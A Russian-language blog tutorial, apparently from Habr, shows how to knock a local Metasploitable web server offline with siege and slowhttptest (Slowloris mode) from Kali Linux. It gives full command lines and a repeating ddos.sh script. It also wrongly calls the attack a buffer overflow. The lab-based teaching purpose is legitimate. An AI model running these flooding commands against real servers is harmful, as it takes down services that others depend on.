Ddos-атака c Kali Linux — простейший пример

в 20:00, , рубрики: атака, виртуализация, информационная безопасность, локальная сеть, локальный сервер, переполнение буфера, Программное обеспечение, Софт, стресс-тестирование

В данной статье я поделюсь опытом ddos атаки уязвимой машины metasploitable.
Как ее устанавливать в виртуалбокс и настраивать я писал в этой статье:
https://habr.com/ru/articles/850188/

Еще раз напоминаю правовую информацию:

Данная статья создана исключительно в ознакомительных/образовательных/развивающих целях.
Автор статьи не несет ответственности за ваши действия.
Автор статьи ни к чему не призывает, более того напоминаю о существовании некоторых статей в уголовном кодексе РФ, их никто не отменял:
УК РФ Статья 272. Неправомерный доступ к компьютерной информации
УК РФ Статья 273. Создание, использование и распространение вредоносных компьютерных программ
УК РФ Статья 274. Нарушение правил эксплуатации средств хранения, обработки или передачи компьютерной информации и информационно-телекоммуникационных сетей

Именно поэтому я использую уязвимую машину на своем устройстве в качестве атакуемого сервера, то есть легитимно, в целях обучения.
Любой другой способ атаки на реальную систему - незаконный, без надлежащих на то санкций.

Вообще данный тип атак называется стресс-тестинг, ддос, или переполнение буфера. Суть такова: внешней атакующей машиной посылается большое количество запросов, и машина-сервер не справляется со всеми запросами. Кстати таким образом можно нагружать не только сервера, но и роутеры, отдельные хосты, шлюзы, и любой другой узел. Если речь идет о крупных серверах или агрегаторах то такой метод нагрузки практически бесполезен, в таких случая злоумышленник(и) (или же аудиторы если стресс-тест санкционированный) пишут особый вид вредоносных программ - ботнет (суть такова что это вредоносное ПО заражает устройства обычных пользователей с целью ддос атаки на сервера-жертвы для массовости атаки).

Приступим к практике запустим уязвимую машину metasploitable, узнаем ее ip адрес ifconfig - 192.168.166.234

Ddos-атака c Kali Linux — простейший пример - 1
Ddos-атака c Kali Linux — простейший пример - 2

Зайдем по адресу 192.168.166.234 и видим что на уязвимой машине на порту 80 через браузер можно зайти на сайт (конечно все локально).

Ddos-атака c Kali Linux — простейший пример - 3

Далее установим необходимые пакеты командой

sudo apt install siege slowhttptest
(у меня они уже установлены)
(у меня они уже установлены)

После установки приступим к атаке. Откроем два разных терминала и в каждый из них введем команды:

└─$ siege http://192.168.166.234/ -d1 -r2000 -c100
└─$ slowhttptest -c 500 -H -g -i 10 -r 200 -t GET  -u http://192.168.166.234/ -x 24 -p 2
Ddos-атака c Kali Linux — простейший пример - 5

Первая siege обозначает что мы атакуем с задержкой максимум в секунду -d1, -r2000 количество повторов текста, -c100 - количество одновременных запросов к серверу.
Вторую команду можно разобрать так: -c 500 - 500 соединений, -H режим "Slowloris", -g генерация статистики, -i 10 секунд до ожидания данных, -r 200 -t GET 200соединений с гет-запросом, далее ip/url сайта/домена, -x 24 -p 2 максимальная длина байта и 2 секунды таймаут.

Запускаем

Ddos-атака c Kali Linux — простейший пример - 6

По началу видим в "слоутесте" service available yes. Вторая программа тоже отправляет "гет-запросы"

Ddos-атака c Kali Linux — простейший пример - 7

спустя время видим в терминалах следующее:

Ddos-атака c Kali Linux — простейший пример - 8
Ddos-атака c Kali Linux — простейший пример - 9

Это значит что сервер "пал"

Пробуем зайти в браузере по адресу http://192.168.166.234/ и видим что сайт "не поднимется".

Ddos-атака c Kali Linux — простейший пример - 10

Атака успешна.

Подытожим. В данном примере хорошо видно как "положить" небольшой уязвимый сервер (тем более что на него отведено не так много системных ресурсов всего 500Мб оперативы и 1-2 ядро процессора). Стресс-тестинг является одним из необходимых видов аудита информационной безопасности (белого хакинга). А на этом у меня сегодня все.

Всем спасибо и до новых встреч.

P.S. Кстати процесс можно автоматизировать, написав скрипт скажем ddos.sh с таким содержимым:

siege http://192.168.166.234/ -d4 -r20 -c4; slowhttptest -c 500 -H -g -i 10 -r 200 -t GET -u http://192.168.166.234/ -x 24 -p 2

или с таким

siege http://192.168.166.234/ -d4 -r20 -c4; slowhttptest -c 500 -H -g -i 10 -r 200 -t GET -u http://192.168.166.234/ -x 24 -p 2
siege http://192.168.166.234/ -d4 -r20 -c4; slowhttptest -c 500 -H -g -i 10 -r 200 -t GET -u http://192.168.166.234/ -x 24 -p 2
siege http://192.168.166.234/ -d4 -r20 -c4; slowhttptest -c 500 -H -g -i 10 -r 200 -t GET -u http://192.168.166.234/ -x 24 -p 2
siege http://192.168.166.234/ -d4 -r20 -c4; slowhttptest -c 500 -H -g -i 10 -r 200 -t GET -u http://192.168.166.234/ -x 24 -p 2
и так далее

разрешить его исполнение в терминале

sudo chmod ugo+x ddos.sh

и просто запустить:

./ddos.sh

Автор: KoshelevGeorge1989

Источник

* - обязательные к заполнению поля


https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js